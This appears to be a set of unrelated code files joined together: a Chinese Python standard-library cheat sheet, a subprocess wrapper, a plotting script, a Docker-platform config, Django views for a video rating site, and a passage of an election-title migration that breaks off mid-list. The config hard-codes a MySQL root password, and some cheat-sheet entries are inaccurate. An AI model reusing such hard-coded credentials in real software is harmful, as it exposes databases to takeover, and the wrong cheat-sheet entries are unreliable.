flags=re.I(re.IGNORECASE) #忽略大小写(括号内是完整写法,下同)
flags=re.M(MULTILINE) #多行模式,改变'^'和'$'的行为(参见上图)
flags=re.S(DOTALL) #点任意匹配模式,改变'.'的行为
---------random----------
random.random() #生成一个0到1的随机浮点数
random.uniform(a,b) #生成一个指定范围a到b的随机浮点数
random.randint(a,b) #生成一个[a,b]的随机整数
random.randrange(a,b,step=c) #步长为c,从[a,b)随机取一个数
random.choice(sequence) #从序列中随机获取一个元素,在python中list、tuple、character都属于sequence
random.sample(sequence,k) #从指定序列中获取指定长度k的片段
random.shuffle(sequence) #对序列进行随机排列(洗牌)
---------glob----------
glob.glob(path) # 将路径作为列表返回
---------OS-------------
os.getcwd() #类似linux系统中的pwd
os.chdir() #cd
os.curdir() #返回当前目录 "."
os.pardir() #获取父目录 ".."
os.makedirs("dirname1/dirname2") #生成多层目录层级
os.removedirs("dirname") #递归删除空目录
os.mkdir("dirname") #生成单级目录"mkdir dirname"
os.rmdir("dirname") #删除单级空目录"rmdir dirname"
os.listdir("dirname") #列出指定目录所有文件和子目录
os.remove() #删除一个文件
os.rename("oldname","newname") #重命名
os.stat("path/filename") #获取文件或者目录信息
os.system("bash command") #用于执行
os.path.abspath(path) #返回path规范化绝对路径
os.path.split(path) #将path分割为目录和文件二元组
os.path.dirname(path) #返回path的目录
os.path.basename(path) #返回path的文件名
os.path.exists(path) #判断path是否存在
os.path.isabs(path) #判断是否绝对路径
os.path.isfile(path) #判断是否是存在的文件
os.path.isdir(path) #判断是否是存在的目录
os.path.join(path1,path2,[...]) #返回组合路径
os.path.getatime(path) #返回path下的文件或目录最后存取时间
os.path.getmtime(path) #返回path下的文件或目录最后修改时间
os.sep #输出操作系统特定的路径分隔符win:\\,linux:/
os.linesep #输出行终止符 win:\t\n,linux:\n
os.pathsep #输出文件路径分隔符
os.name #输出指示当前系统的字符串win:"nt",linux:"posix"
os.environ #输出环境变量
--------sys---------
sys.argv #读取命令行参数列表,argv[0]是代码本身文件路径,argv[1]是第一个参数
sys.exit()
sys.version
sys.path #返回模块的搜索路径
sys.platform #返回操作系统平台名称
sys.maxint #最大的int值 ?
sys.stdout.write("please:")
val = sys.stdin.readline()[:-1] #?
-----shutil---------文件、文件夹、压缩包的处理模块
shutil.copyfileobj(fsrc, fdst[, length]) #将文件fsrc内容拷贝到另一个文件fdst中,可以部分内容length
shutil.copyfile(src, dst) #拷贝文件
shutil.copymode(src, dst) #仅拷贝权限,内容、组、用户均不变
shutil.copy(src, dst) #拷贝文件和权限
shutil.copystat(src, dst) #拷贝状态信息,包括:mode bits, atime, mtime, flags
shutil.copy2(src, dst) #拷贝文件和状态信息
shutil.copytree(src, dst, symlinks=False, ignore=None) #递归的去拷贝文件(拷贝目录)
shutil.rmtree(path[, ignore_errors[, onerror]]) #递归的去删除文件(删除目录)
shutil.move(src, dst) #递归的去移动文件(移动目录)
---压缩---
shutil.make_archive(base_name, format,...) #创建压缩包并返回文件路径
'''
base_name: 压缩包的文件名,也可以是压缩包的路径。只是文件名时,则保存至当前目录,否则保存至指定路径
format: 压缩包种类,“zip”, “tar”, “bztar”,“gztar”
root_dir:要压缩的文件夹路径(默认当前目录)
owner: 用户,默认当前用户
group: 组,默认当前组
logger: 用于记录日志,通常是logging.Logger对象
将 /Users/wupeiqi/Downloads/test 下的文件打包放置 /Users/wupeiqi/ 下,命名为"www"
shutil.make_archive("/Users/wupeiqi/www", 'gztar', root_dir='/Users/wupeiqi/Downloads/test')
'''
---解压---
shutil 对压缩包的处理是调用 ZipFile 和 TarFile 两个模块来进行的,详细:
import zipfile
# 压缩
z = zipfile.ZipFile('laxi.zip', 'w')
z.write('a.log')
z.write('data.data')
z.close()
# 解压
z = zipfile.ZipFile('laxi.zip', 'r')
z.extractall()
z.close()
import tarfile
# 压缩
tar = tarfile.open('your.tar','w')
tar.add('/Users/wupeiqi/PycharmProjects/bbs2.zip', arcname='bbs2.zip')
tar.add('/Users/wupeiqi/PycharmProjects/cmdb.zip', arcname='cmdb.zip')
tar.close()
# 解压
tar = tarfile.open('your.tar','r')
tar.extractall() # 可设置解压地址
tar.close()
----------xml.etree.ElementTree-----------
xml.etree.ElementTree.parse("xml文档").getroot().tag
xml.etree.ElementTree.parse("xml文档").getroot().iter("节点")
xml.etree.ElementTree.parse("xml文档").getroot().remove("节点")
import xml.etree.ElementTree as ET
tree = ET.parse("xmltest.xml") #解析xml文档
root = tree.getroot() #获取xml所有节点
print(root.tag) #'data'
# 遍历xml文档
for a in root:
print(a.tag, a.attrib) #遍历子节点
for b in a:
print(b.tag, b.text,b.attrib) #遍历孙节点
# 只遍历year 节点
for node in root.iter('year'):
print(node.tag, node.text)
#修改
for node in root.iter('year'):
new_year = int(node.text) + 1
node.text = str(new_year)
node.set("updated","yes")
tree.write("xmltest.xml")
#删除
for country in root.findall('country'):
rank = int(country.find('rank').text)
if rank > 50:
root.remove(country)
tree.write('output.xml')
#创建
new_xml = ET.Element("personinfolist")
personinfo = ET.SubElement(new_xml, "personinfo", attrib={"enrolled": "yes"})
name = ET.SubElement(personinfo, "name")
name.text = "Alex Li"
age = ET.SubElement(personinfo, "age", attrib={"checked": "no"})
sex = ET.SubElement(personinfo, "sex")
age.text = '56'
personinfo2 = ET.SubElement(new_xml, "personinfo", attrib={"enrolled": "no"})
name = ET.SubElement(personinfo2, "name")
name.text = "Oldboy Ran"
age = ET.SubElement(personinfo2, "age")
age.text = '19'
et = ET.ElementTree(new_xml) # 生成文档对象
et.write("test.xml", encoding="utf-8", xml_declaration=True)
ET.dump(new_xml) # 打印生成的格式
---------------configparser-------------
#生成配置文件-----configparser.ConfigParser()
import configparser
config = configparser.ConfigParser()
config["DEFAULT"] = {'ServerAliveInterval': '45',
'Compression': 'yes',
'CompressionLevel': '9'}
config['bitbucket.org'] = {}
config['bitbucket.org']['User'] = 'hg'
config['topsecret.server.com'] = {}
topsecret = config['topsecret.server.com']
topsecret['Host Port'] = '50022' # mutates the parser
topsecret['ForwardX11'] = 'no' # same here
config['DEFAULT']['ForwardX11'] = 'yes'
with open('example.ini', 'w') as configfile:
config.write(configfile)
#读取配置文件内容----config.read(),config.sections()
config.read('example.ini')
['example.ini']
config.sections() #输出节点
['bitbucket.org', 'topsecret.server.com']
'bitbucket.org' in config
True
config['bitbucket.org']['User']
'hg'
config['DEFAULT']['Compression']
'yes'
import ConfigParser
config = ConfigParser.ConfigParser()
config.read('i.cfg')
#按节点读取----
secs = config.sections()
print secs
options = config.options('group2')
print options
item_list = config.items('group2')
print item_list
val = config.get('group1','key')
val = config.getint('group1','key')
#改写-------
sec = config.remove_section('group1')
config.write(open('i.cfg', "w"))
sec = config.has_section('wupeiqi')
sec = config.add_section('wupeiqi')
config.write(open('i.cfg', "w"))
config.set('group2','k1',11111)
config.write(open('i.cfg', "w"))
config.remove_option('group2','age')
config.write(open('i.cfg', "w"))
------------hashlib加密模块----------
import hashlib
----md5----
hash = hashlib.md5()
hash.update("HelloIt's me天王盖地虎".encode(encoding="utf-8"))
print(hash.hexdigest())
----sha1----
hash = hashlib.sha1()
hash.update('admin')
print(hash.hexdigest())
----sha256----
hash = hashlib.sha256()
hash.update('admin')
print(hash.hexdigest())
----sha384----
hash = hashlib.sha384()
hash.update('admin')
print(hash.hexdigest())
----sha512----
hash = hashlib.sha512()
hash.update('admin')
print(hash.hexdigest())
----hmac----#更牛逼的加密模块
import hmac
h = hmac.new(b"12345","you are 250你是".encode(encoding="utf-8"))
print(h.digest()) #十进制
print(h.hexdigest()) #十六进制
===================面向对象编程===========================
class Dog(object):
def __init__(self,name):
self.name = name
def singledog(self):
print("%s:汪汪汪。。。"% self.name)
Dog("小郑子").singledog()
class Role(object):
n = 123 #类变量:共有属性,节省内存
n_list = []
name = "我是类name"
def __init__(self, name, role, weapon, life_value=100, money=15000):
#构造函数:__init__在实例化时做一些类的初始化的工作
self.name = name #实质为r1.name=name,实例变量(静态属性),作用域就是实例本身
self.role = role
self.weapon = weapon
self.__life_value = life_value #私有属性
self.money = money
def __del__(self):
#析构函数:__del__在实例释放、销毁的时候自动执行的,通常用于做一些收尾工作,如关闭一些数据库连接,关闭打开的临时文件
print("%s 彻底死了。。。。" %self.name)
def show_status(self): #定义一个方法查看私有属性
print("name:%s weapon:%s life_val:%s" %(self.name,self.weapon, self.__life_value))
def __shot(self): #私有方法
print("shooting...")
def got_shot(self):# 类的方法,功能 (动态属性)
self.__life_value -=50
print("%s:ah...,I got shot..."% self.name)
def buy_gun(self, gun_name):
print("%s just bought %s" % (self.name,gun_name))
r1 = Role('Chenronghua','police','AK47') #把一个类变成一个具体对象的过程叫 实例化(初始化一个类Role,造了一个对象r1)
r1.buy_gun("AK47")
r1.got_shot()
r1.__shot() #私有方法,无法外部调用
print(r1.show_status())
r2 = Role('jack', 'terrorist', 'B22') #生成一个角色
r2.got_shot()
-----继承-----
class People(object): #新式类
def __init__(self,name,age):
self.name = name
self.age = age
self.friends = []
print("--doens't run ")
def eat(self):
print("%s is eating..." % self.name)
def talk(self):
print("%s is talking..." % self.name)
def sleep(self):
print("%s is sleeping..." % self.name)
class Relation(object):
def __init__(self,n1,n2):
print("init in relation")
def make_friends(self,obj): #w1
print("%s is making friends with %s" % (self.name,obj.name))
self.friends.append(obj.name)
class Man(Relation,People):
def __init__(self,name,age,money):
# People.__init__(self,name,age) #调用People的__init__属性
super(Man,self).__init__(name,age) #新式类写法
self.money = money
print("%s 一出生就有%s money" %(self.name,self.money))
def piao(self):
print("%s is piaoing ..... 20s....done." % self.name)
def sleep(self):
People.sleep(self)
print("man is sleeping ")
class Woman(People,Relation):
def get_birth(self):
print("%s is born a baby...." % self.name)
m1 = Man("NiuHanYang",22)
w1 = Woman("ChenRonghua",26)
m1.make_friends(w1)
w1.name = "陈三炮"
print(m1.friends[0])
----静态方法----
'''通过@staticmethod装饰器即可把其装饰的方法变为一个静态方法,
静态方法是不可以访问实例变量或类变量的,其实相当于跟类本身已
经没什么关系了,它与类唯一的关联就是需要通过类名来调用这个方法'''
class Dog(object):
def __init__(self,name):
self.name = name
@staticmethod #把eat方法变为静态方法
def eat(self):
print("%s is eating" % self.name)
d = Dog("ChenRonghua")
d.eat()
'''调用d.eat()会出错误,当eat变成静态方法后,通过实例调用时不会自动把实例本身当作一个参数传给self。
想让上面的代码可以正常工作有两种办法:
1. 调用时主动传递实例本身给eat方法,即d.eat(d)
2. 在eat方法中去掉self参数,但这也意味着,在eat中不能通过self.调用实例中的其它变量了'''
----类方法----
#通过@classmethod装饰器实现,类方法只能访问类变量,不能访问实例变量
class Dog(object):
#name = "我是类变量" #定义一个类变量
def __init__(self,name):
self.name = name
@classmethod
def eat(self):
print("%s is eating" % self.name)
d = Dog("ChenRonghua")
d.eat()
----属性方法----
#通过@property把一个方法变成一个静态属性
class Dog(object):
def __init__(self,name):
self.name = name
@property
def eat(self):
print(" %s is eating" %self.name)
d = Dog("ChenRonghua")
d.eat()
'''调用会出以下错误,说NoneType is not callable,
因为eat此时已经变成一个静态属性了, 不是方法了,
想调用已经不需要加()号了,直接d.eat就可以了'''
class Flight(object):
def __init__(self,name):
self.flight_name = name
def checking_status(self):
print("checking flight %s status " % self.flight_name)
return 1
@property
def flight_status(self):
status = self.checking_status()
if status == 0 :
print("flight got canceled...")
elif status == 1 :
print("flight is arrived...")
elif status == 2:
print("flight has departured already...")
else:
print("cannot confirm the flight status...,please check later")
@flight_status.setter #修改
def flight_status(self,status):
status_dic = {
0 : "canceled",
1 :"arrived",
2 : "departured"
}
print("\033[31;1mHas changed the flight status to \033[0m",status_dic.get(status) )
@flight_status.deleter #删除
def flight_status(self):
print("status got removed...")
f = Flight("CA980")
f.flight_status
f.flight_status = 2 #触发@flight_status.setter
del f.flight_status #触发@flight_status.deleter
----类的特殊成员方法----
1.__doc__ :表示类的描述信息
class Foo:
""" 描述类信息,这是用于看片的神奇 """
def func(self):
pass
print(Foo.__doc__)
2.__module__:表示当前操作的对象在那个模块
3.__class__ :表示当前操作的对象的类是什么
3. __init__:构造方法,通过类创建对象时,自动触发执行。
4.__del__:析构方法,当对象在内存中被释放时,自动触发执行。
'''此方法一般无须定义,因为Python是一门高级语言,程序员在使用时
无需关心内存的分配和释放,因为此工作都是交给Python解释器来执行,
所以,析构函数的调用是由解释器在进行垃圾回收时自动触发执行的'''
5.__call__:对象后面加括号,触发执行。
'''构造方法的执行是由创建对象触发的,即:对象 = 类名() ;而对于
__call__ 方法的执行是由对象后加括号触发的,即:对象() 或者 类()()'''
6.__dict__:查看类或对象中的所有成员属性、方法 #类/对象.__dict__
7.__str__:在打印对象时,默认输出该方法的返回值
8.__getitem__、__setitem__、__delitem__:用于索引操作,如字典。分别表示获取、设置、删除数据
class Foo(object):
def __getitem__(self, key):
print('__getitem__',key)
def __setitem__(self, key, value):
print('__setitem__',key,value)
def __delitem__(self, key):
print('__delitem__',key)
obj = Foo()
result = obj['k1'] # 自动触发执行 __getitem__
obj['k2'] = 'alex' # 自动触发执行 __setitem__
del obj['k1'] #触发执行 __delitem__
9.__new__, __metaclass__:#对象是通过执行类的构造方法创建,类对象是 type 类的一个实例,即:类是通过type类的构造方法创建
#__new__先于__init__执行
#metaclass 详解文章:http://stackoverflow.com/questions/100003/what-is-a-metaclass-in-python 得票最高那个答案写的非常好
----反射----
class Foo(object):
def __init__(self):
self.name = 'wupeiqi'
def func(self):
return 'func'
obj = Foo()
# 检查是否含有成员
hasattr(obj, 'name')
hasattr(obj, 'func')
# 获取成员
getattr(obj, 'name')
getattr(obj, 'func')
# 设置成员
setattr(obj, 'age', 18)
setattr(obj, 'show', lambda num: num + 1)
# 删除成员
delattr(obj, 'name')
delattr(obj, 'func')
==========================socket=================================
#http://www.cnblogs.com/wupeiqi/articles/5040823.html
==========================thread=================================
#http://www.cnblogs.com/alex3714/articles/5230609.html
#
==========================字体颜色控制===========================
格式:\033[显示方式;前景色;背景色m
说明:
前景色 背景色 颜色
---------------------------------------
30 40 黑色
31 41 红色
32 42 绿色
33 43 黃色
34 44 蓝色
35 45 紫红色
36 46 青蓝色
37 47 白色
显示方式 意义
-------------------------
0 终端默认设置
1 高亮显示
4 使用下划线
5 闪烁
7 反白显示
8 不可见
例子:
\033[1;31;40m <!--1-高亮显示 31-前景色红色 40-背景色黑色-->
\033[0m <!--采用终端默认设置,即取消颜色设置-->
|
#!/usr/bin/python -tt
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import os
from subprocess import *
from mic import msger
def runtool(cmdln_or_args, catch=1):
    """ wrapper for most of the subprocess calls
    input:
        cmdln_or_args: can be both args and cmdln str (shell=True)
        catch: 0, quietly run
               1, only STDOUT
               2, only STDERR
               3, both STDOUT and STDERR
    return:
        (rc, output)
        if catch==0: the output will always None
    """
    if catch not in (0, 1, 2, 3):
        # invalid catch selection, will cause exception, that's good
        return None

    # A list means exec-style args (shell=False); a string means a full
    # command line to be run through the shell.
    if isinstance(cmdln_or_args, list):
        cmd = cmdln_or_args[0]
        shell = False
    else:
        import shlex
        cmd = shlex.split(cmdln_or_args)[0]
        shell = True

    # Any stream not being captured is redirected to /dev/null.
    if catch != 3:
        dev_null = os.open("/dev/null", os.O_WRONLY)

    if catch == 0:
        sout = dev_null
        serr = dev_null
    elif catch == 1:
        sout = PIPE
        serr = dev_null
    elif catch == 2:
        sout = dev_null
        serr = PIPE
    elif catch == 3:
        sout = PIPE
        serr = STDOUT

    try:
        p = Popen(cmdln_or_args, stdout=sout, stderr=serr, shell=shell)
        (sout, serr) = p.communicate()
        # combine stdout and stderr, filter None out
        out = ''.join(filter(None, [sout, serr]))
    # Bug fix: `except OSError, e:` is Python-2-only syntax; the
    # `as` form is accepted by Python 2.6+ and Python 3.
    except OSError as e:
        if e.errno == 2:
            # [Errno 2] No such file or directory
            msger.error('Cannot run command: %s, lost dependency?' % cmd)
        else:
            raise # relay
    finally:
        # Close /dev/null only when it was actually opened above.
        if catch != 3:
            os.close(dev_null)

    return (p.returncode, out)
def show(cmdln_or_args):
    """Run a command, log its combined stdout/stderr via msger.verbose,
    and return the exit status."""
    rc, out = runtool(cmdln_or_args, catch=3)

    if isinstance(cmdln_or_args, list):
        cmd = ' '.join(cmdln_or_args)
    else:
        cmd = cmdln_or_args

    # Assemble the log message piecewise, then emit it in one call.
    pieces = ['running command: "%s"' % cmd]
    if out:
        out = out.strip()
    if out:
        pieces.append(', with output::')
        pieces.append('\n +----------------')
        for line in out.splitlines():
            pieces.append('\n | %s' % line)
        pieces.append('\n +----------------')

    msger.verbose(''.join(pieces))
    return rc
def outs(cmdln_or_args, catch=1):
    """Return the captured output of the command, stripped of
    surrounding whitespace."""
    result = runtool(cmdln_or_args, catch)
    return result[1].strip()
def quiet(cmdln_or_args):
    """Run the command without capturing output; only the exit status
    is of interest."""
    rc, _ = runtool(cmdln_or_args, catch=0)
    return rc
|
import matplotlib.pyplot as plt
import test_dev.data as data_collection

# Collect one (max batch size, commit time) point per run, and keep the
# running totals used by the alternative throughput title below.
max_batch_sizes = []
time_commit = []
num_tran = 0
time_ = 0
for data in data_collection.data:
    max_batch_sizes.append(data.get("max_batch_size"))
    time_commit.append(data.get("commit_time"))
    num_tran += data.get("num_transactions")
    time_ += data.get("commit_time")

plt.plot(max_batch_sizes, time_commit, marker='o', markersize=12)
# naming the x axis
plt.xlabel('Kích thước lô tối đa')
# naming the y axis
plt.ylabel('thời gian hoàn thành(s)')
# giving a title to my graph
# plt.title('Kích thước lô = ' + str(data_collection.data[0].get("max_batch_size")) +
#           '; giá trị trung bình :' + str(round(num_tran / time_, 2)) + " giao dịch/s")
plt.title('Gửi cố định 1000 giao dịch')
# function to show the plot
plt.show()
|
# coding: utf-8

# Strings rendered into the web templates.
template_variables = {
    'title': u'Docker管理平台',
    'name': u'Docker管理平台',
    'username': "",
}

# MySQL connection settings.
# NOTE(review): credentials are hard-coded here; consider loading them
# from the environment rather than committing them to source control.
DATABASES = {
    'DB': 'shipman',
    'USERNAME': 'root',
    'PASSWORD': 'oldboy@123',
    'HOST': '192.168.11.122',
    'PORT': 3306,
}

# Field names describing a cluster node.
NODE_LIST = ['node_ip', 'port']

# Cookie key used to identify the logged-in user.
COOKIE_NAME = "user_id"
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.db.models import Q, Avg
from django.http import HttpResponse, HttpResponseNotFound, Http404
from django.template import RequestContext, loader
import json
from web.models import Category, Submission, VoteCategory
def category(request, cat):
    """
    - Generates the view for a specific category
    - Creates the breadcrumbs for the page

    ``cat`` is the primary key of the Category to render; raises Http404
    when no such category exists.
    """
    try:
        category = Category.objects.get(id=cat)
    except Category.DoesNotExist:
        raise Http404
    # Categories appear to form a two-level tree via the `parent`/`child`
    # relations — TODO confirm against the Category model.
    parents = category.parent.all()
    breadcrumbs = [{'url': reverse('home'), 'title': 'Home'}]
    if len(parents) == 0:
        # Top-level category: show submissions tagged with it or with any
        # of its children.
        parent = category
        content = Submission.objects.filter( Q(tags=category) | Q(tags__in=category.child.distinct()) ).distinct()
    else:
        # Child category: only submissions tagged with it directly; use
        # the first parent for the breadcrumb trail.
        parent = parents[0]
        content = Submission.objects.filter( Q(tags=category) ).distinct()
    breadcrumbs.append({'url': reverse('category', args=[parent.id]), 'title': parent})
    breadcrumbs.append({'url': reverse('category', args=[category.id]), 'title': category})
    # un-json-fy the videos (the `video` field stores a JSON-encoded list)
    for c in content:
        if c.video: c.video = [v for v in json.loads(c.video)]
    if request.user.is_authenticated():
        # Attach this user's rating per vote category to each submission,
        # keyed by the vote category's id.
        for c in content:
            ratings = c.votes.filter(user=request.user)
            c.user_rating = {}
            if ratings.count() > 0:
                for r in ratings:
                    c.user_rating[int(r.v_category.id)] = int(r.rating)
    expositions = category.exposition_set.all()
    t = loader.get_template('home/index.html')
    c = RequestContext(request, {
        'breadcrumbs': breadcrumbs,
        'content': content,
        'expositions': expositions,
        'parent_category': parent,
        'parent_categories': Category.objects.filter(parent=None),
        'selected_category': category,
        'vote_categories': VoteCategory.objects.all(),
    })
    return HttpResponse(t.render(c))
def index(request):
    """Render the home page.

    Builds, for every vote category, the five submissions with the best
    average rating.  The rankings are expensive to compute, so they are
    cached for ten minutes under the key 'top_ranked_videos'.
    """
    rankings = cache.get('top_ranked_videos')
    if not rankings:
        # Cache miss: compute an average rating per submission and keep
        # the top five for each vote category.
        rankings = [
            {
                'vote_category': vc,
                'submissions': Submission.objects.filter(votes__v_category=vc).annotate(average_rating=Avg('votes__rating')).order_by('-average_rating')[:5],
            }
            for vc in VoteCategory.objects.all()
        ]
        cache.set('top_ranked_videos', rankings, 60 * 10)

    template = loader.get_template('home/index.html')
    context = RequestContext(request, {
        'breadcrumbs': [{'url': reverse('home'), 'title': 'Home'}],
        'parent_categories': Category.objects.filter(parent=None),
        'top_ranked_videos': rankings,
        'vote_categories': VoteCategory.objects.all(),
    })
    return HttpResponse(template.render(context))
def post(request, sid):
    """
    - Generates the view for the specific post (submission) from `sid`
    - Creates the appropriate breadcrumbs for the categories
    """
    s = Submission.objects.get(id=sid)
    # The `video` field stores a JSON-encoded list; decode for the template.
    s.video = [v for v in json.loads(s.video)]
    breadcrumbs = [{'url': reverse('home'), 'title': 'Home'}]
    # Prefer a top-level (parent-less) tag as the parent breadcrumb.
    parent_categories = s.tags.filter(parent=None)
    if len(parent_categories) >= 1:
        parent = parent_categories[0]
        breadcrumbs.append({'url': reverse('category', args=[parent.id]), 'title': parent})
    else: parent = None
    # The first non-top-level tag, if any, becomes the selected category.
    categories = s.tags.filter( ~Q(parent=None) )
    if len(categories) >= 1:
        category = categories[0]
    else: category = None
    # Bug fix: the original dereferenced `category` here even when the
    # submission had no child tag (category is None), raising
    # AttributeError; also reuse the already-fetched queryset instead of
    # re-querying `category.parent.all()` a second time.
    if parent is None and category is not None:
        c = category.parent.all()
        if len(c) > 0:
            c = c[0]
            breadcrumbs.append({'url': reverse('category', args=[c.id]), 'title': c})
    if category:
        breadcrumbs.append({'url': reverse('category', args=[category.id]), 'title': category})
    t = loader.get_template('home/index.html')
    c = RequestContext(request, {
        'breadcrumbs': breadcrumbs,
        'content': [s],
        'parent_category': parent,
        'parent_categories': Category.objects.filter(parent=None),
        'selected_category': category,
        'vote_categories': VoteCategory.objects.all(),
    })
    return HttpResponse(t.render(c))
|
from django.db import migrations
# Maps historic election identifiers ("<type>.<area>.<date>") to their
# human-readable titles; consumed by fix_old_election_titles below to
# backfill election_title on rows created before titles were stored.
election_title_map = {
"mayor.bedford.2019-05-02": "Mayor of Bedford",
"mayor.bedford.2021-01-01": "Mayor of Bedford",
"mayor.bristol.2016-05-05": "Mayor of Bristol",
"mayor.bristol.2020-05-07": "Mayor of Bristol",
"mayor.bristol.2021-01-01": "Mayor of Bristol",
"mayor.cambridgeshire-and-peterborough.2017-05-04": "Mayor of Cambridgeshire and Peterborough Combined Authority",
"mayor.cambridgeshire-and-peterborough.2021-01-01": "Mayor of Cambridgeshire and Peterborough Combined Authority",
"mayor.copeland.2019-05-02": "Mayor of Copeland",
"mayor.copeland.2021-01-01": "Mayor of Copeland",
"mayor.doncaster.2017-05-04": "Mayor of Doncaster Metropolitan Borough Council",
"mayor.doncaster.2021-01-01": "Mayor of Doncaster Metropolitan Borough Council",
"mayor.greater-manchester-ca.2017-05-04": "Mayor of Greater Manchester",
"mayor.greater-manchester-ca.2020-05-07": "Mayor of Greater Manchester",
"mayor.greater-manchester-ca.2021-01-01": "Mayor of Greater Manchester",
"mayor.hackney.2018-05-03": "Mayor of Hackney",
"mayor.hackney.2021-01-01": "Mayor of Hackney",
"mayor.leicester.2019-05-02": "Mayor of Leicester",
"mayor.leicester.2021-01-01": "Mayor of Leicester",
"mayor.lewisham.2018-05-03": "Mayor of Lewisham",
"mayor.lewisham.2021-01-01": "Mayor of Lewisham",
"mayor.liverpool.2016-05-05": "Mayor of Liverpool",
"mayor.liverpool.2020-05-07": "Mayor of Liverpool",
"mayor.liverpool.2021-01-01": "Mayor of Liverpool",
"mayor.liverpool-city-ca.2017-05-04": "Mayor of Liverpool City Region",
"mayor.liverpool-city-ca.2020-05-07": "Mayor of Liverpool City Region",
"mayor.liverpool-city-ca.2021-01-01": "Mayor of Liverpool City Region",
"mayor.london.2016-05-05": "Mayor of London",
"mayor.london.2020-05-07": "Mayor of London",
"mayor.london.2021-01-01": "Mayor of London",
"mayor.mansfield.2019-05-02": "Mayor of Mansfield",
"mayor.mansfield.2021-01-01": "Mayor of Mansfield",
"mayor.middlesbrough.2019-05-02": "Mayor of Middlesbrough",
"mayor.middlesbrough.2021-01-01": "Mayor of Middlesbrough",
"mayor.newham.2018-05-03": "Mayor of Newham",
"mayor.newham.2021-01-01": "Mayor of Newham",
"mayor.north-of-tyne.2019-05-02": "Mayor of the North of Tyne Combined Authority",
"mayor.north-of-tyne.2021-01-01": "Mayor of the North of Tyne Combined Authority",
"mayor.north-tyneside.2017-05-04": "Mayor of North Tyneside Council",
"mayor.north-tyneside.2021-01-01": "Mayor of North Tyneside Council",
"mayor.salford.2016-05-05": "Mayor of Salford",
"mayor.salford.2020-05-07": "Mayor of Salford",
"mayor.salford.2021-01-01": "Mayor of Salford",
"mayor.sheffield-city-ca.2018-05-03": "Mayor of the Barnsley, Doncaster, Rotherham and Sheffield Combined Authority",
"mayor.sheffield-city-ca.2021-01-01": "Mayor of the Barnsley, Doncaster, Rotherham and Sheffield Combined Authority",
"mayor.tees-valley.2017-05-04": "Mayor of Tees Valley Combined Authority",
"mayor.tees-valley.2020-05-07": "Mayor of Tees Valley Combined Authority",
"mayor.tees-valley.2021-01-01": "Mayor of Tees Valley Combined Authority",
"mayor.torbay.2021-01-01": "Mayor of Torbay",
"mayor.tower-hamlets.2018-05-03": "Mayor of Tower Hamlets",
"mayor.tower-hamlets.2021-01-01": "Mayor of Tower Hamlets",
"mayor.watford.2018-05-03": "Mayor of Watford",
"mayor.watford.2021-01-01": "Mayor of Watford",
"mayor.west-midlands.2017-05-04": "Mayor of West Midlands Combined Authority",
"mayor.west-midlands.2020-05-07": "Mayor of West Midlands Combined Authority",
"mayor.west-midlands.2021-01-01": "Mayor of West Midlands Combined Authority",
"mayor.west-of-england.2017-05-04": "Mayor of West of England Combined Authority",
"mayor.west-of-england.2021-01-01": "Mayor of West of England Combined Authority",
"gla.c.barnet-and-camden.2016-05-05": "Greater London Assembly elections (Constituencies) Barnet and Camden",
"gla.c.bexley-and-bromley.2016-05-05": "Greater London Assembly elections (Constituencies) Bexley and Bromley",
"gla.c.brent-and-harrow.2016-05-05": "Greater London Assembly elections (Constituencies) Brent and Harrow",
"gla.c.city-and-east.2016-05-05": "Greater London Assembly elections (Constituencies) City and East",
"gla.c.croydon-and-sutton.2016-05-05": "Greater London Assembly elections (Constituencies) Croydon and Sutton",
"gla.c.ealing-and-hillingdon.2016-05-05": "Greater London Assembly elections (Constituencies) Ealing and Hillingdon",
"gla.c.enfield-and-haringey.2016-05-05": "Greater London Assembly elections (Constituencies) Enfield and Haringey",
"gla.c.greenwich-and-lewisham.2016-05-05": "Greater London Assembly elections (Constituencies) Greenwich and Lewisham",
"gla.c.havering-and-redbridge.2016-05-05": "Greater London Assembly elections (Constituencies) Havering and Redbridge",
"gla.c.lambeth-and-southwark.2016-05-05": "Greater London Assembly elections (Constituencies) Lambeth and Southwark",
"gla.c.merton-and-wandsworth.2016-05-05": "Greater London Assembly elections (Constituencies) Merton and Wandsworth",
"gla.c.north-east.2016-05-05": "Greater London Assembly elections (Constituencies) North East",
"gla.c.south-west.2016-05-05": "Greater London Assembly elections (Constituencies) South West",
"gla.c.west-central.2016-05-05": "Greater London Assembly elections (Constituencies) West Central",
"gla.c.barnet-and-camden.2020-05-07": "Greater London Assembly elections (Constituencies) Barnet and Camden",
"gla.c.bexley-and-bromley.2020-05-07": "Greater London Assembly elections (Constituencies) Bexley and Bromley",
"gla.c.brent-and-harrow.2020-05-07": "Greater London Assembly elections (Constituencies) Brent and Harrow",
"gla.c.city-and-east.2020-05-07": "Greater London Assembly elections (Constituencies) City and East",
"gla.c.croydon-and-sutton.2020-05-07": "Greater London Assembly elections (Constituencies) Croydon and Sutton",
"gla.c.ealing-and-hillingdon.2020-05-07": "Greater London Assembly elections (Constituencies) Ealing and Hillingdon",
"gla.c.enfield-and-haringey.2020-05-07": "Greater London Assembly elections (Constituencies) Enfield and Haringey",
"gla.c.greenwich-and-lewisham.2020-05-07": "Greater London Assembly elections (Constituencies) Greenwich and Lewisham",
"gla.c.havering-and-redbridge.2020-05-07": "Greater London Assembly elections (Constituencies) Havering and Redbridge",
"gla.c.lambeth-and-southwark.2020-05-07": "Greater London Assembly elections (Constituencies) Lambeth and Southwark",
"gla.c.merton-and-wandsworth.2020-05-07": "Greater London Assembly elections (Constituencies) Merton and Wandsworth",
"gla.c.north-east.2020-05-07": "Greater London Assembly elections (Constituencies) North East",
"gla.c.south-west.2020-05-07": "Greater London Assembly elections (Constituencies) South West",
"gla.c.west-central.2020-05-07": "Greater London Assembly elections (Constituencies) West Central",
"naw.c.aberavon.2016-05-05": "National Assembly for Wales elections (Constituencies) Aberavon",
"naw.c.aberconwy.2016-05-05": "National Assembly for Wales elections (Constituencies) Aberconwy",
"naw.c.alyn-and-deeside.2016-05-05": "National Assembly for Wales elections (Constituencies) Alyn and Deeside",
